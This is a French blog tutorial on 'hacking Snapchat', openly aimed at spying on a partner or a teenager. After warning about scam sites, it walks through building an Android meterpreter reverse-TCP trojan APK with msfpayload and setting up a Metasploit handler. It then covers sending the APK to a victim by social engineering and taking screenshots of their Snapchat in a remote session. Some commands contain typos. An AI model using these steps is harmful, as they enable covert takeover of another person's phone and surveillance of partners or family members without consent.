Juin 6, 2017
30 minutes
Moyen

Comment pirater Snapchat ? Voici une question que quelques utilisateurs de Snapchat se posent. Comment pirater Snapchat de mon copain pour savoir s’il est fidèle ? Comment pirater Snapchat pour contrôler ce que fait mon ado sur son smartphone ?


La première chose que fait l’internaute, c’est généralement d’essayer de trouver la réponse en faisant une recherche Google.

Devinez quoi ? Et bien, sur toute la première page de résultat, on trouve une grande liste d’arnaqueurs qui promettent de récupérer des vidéos, des photos et des journaux de chat de n’importe quel compte Snapchat.

Il y a des tas d’arnaques en tout genre sur la première page Google. Mais, désolé de vous dire que ces sites vous donne de faux espoirs et tous ces programmes sont créé dans le but de récupérer votre mot passe Snapchat, pour voler votre argent ou encore pour prendre le contrôle de votre smartphone.

Alors comment pirater un compte Snapchat ?

Un programme de piratage direct n’existe pas. En aucun cas, il n’y aura un miracle qui vous fera pirater une personne.

Cependant, la sécurité informatique garantie à 100 % n’existe pas. Donc pour vraiment pirater un compte Snapchat, il faut être patient et intelligent. Si vous voulez des outils spécialisés, vous pouvez par exemple vous orienter vers la distribution Kali Linux.

Pirater un téléphone mobile avec Metasploit

Cette technique consiste a exploiter les failles du système Android, iOS ou des applications installés dedans.

Chaque jour, des nouvelles failles de sécurité sont découverte par des hackers sur les systèmes Android et iOS. Ces failles sont exploitable et permet ainsi à une personne de prendre le contrôle total d’un smartphone ou tablette.

Pour exploiter ces failles, un pirate crée une application APK malveillante et l’envoie à une victime. Une fois l’application est installée sur le smartphone de la victime, il est facile de prendre le contrôlé de son smartphone et récupérer ses photos et vidéos Snapchat.

Pour cela, les pirates utilisent l’outil Metasploit disponible sur Kali linux.

C’est un outil pour le développement et l’exécution d’exploits contre une machine distante. Il contient des centaines d’exploits et permettront d’attaquer tout type de machines.

Si vous voulez tester cette méthode sur votre téléphone et vous avez un ordinateur sous Windows alors  je vous conseille d’utiliser une machine virtuel faisant tourner Kali Linux. Il suffit de télécharger VMware et une image de Kali Linux. Métasploit est déjà pré-installé dessus. Voici comment installer Kali Linux sur une machine Windows avec VMware.

Les commandes utilisées pour pirater un mobile à distance

Tout d’abord, nous allons ouvrir le terminal Kali Linux ensuite nous allons créer le trojan APK (c’est l’application que nous allons envoyer à la cible).

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4 lport=4444 > /root/Desktop/nom-de-votre-application.apk (replacez LHOST avec votre propre adresse IP)

Après nous allons ouvrir un autre terminal et lancer Metasploit pour configurer notre trojan APK.

msfconsole (permet d’ouvrir l’outil métasploit)
use exploits/multi/handler (permet de sélectionner l’exploit handler)
set paylaod android/meterpreter/reverse_tcp
set lhost votre_adresse_ip
exploit

Voila le module est bien configuré, il reste maintenant d’envoyer l’APK à une victime en utilisant l’ingénierie sociale. Lorsque la victime installera l’application sur son mobile, Metasploit vous indiquera quelque chose comme ceci :

Il ne nous reste plus qu’à ouvrir une session Meterpreter à distance sur le mobile de la victime :

msf > sessions -i 1
[*] Starting interaction with 1…

Nous avons désormais le contrôle total du smartphone.  Par exemple : nous pouvons faire des captures d’écran de à distance de l’application Snapchat:

meterpreter > use espia
Loading extension espia…success.
meterpreter > screenshot snapchat.jpg

Afin d’apprendre plus sur Metasploit, je vous invite à lire cet article: c’est quoi Metasploit et comment bien l’utiliser ?

Conclusion

Pirater un compte Snapchat, n’est pas du tout une chose facile. Cette technique n’est pas fiable à 100%. Si la cible est bien protégé, vous n’aurez rien a faire.

J’espère qu’a travers ce tutoriel, vous avez bien compris comment fonctionne le piratage des applications Android ou iOS comme Snapchat.

Si vous avez des ajouts pour rendre cette page une base de donnée concernant Snapchat, n’hésitez pas à poster votre commentaire !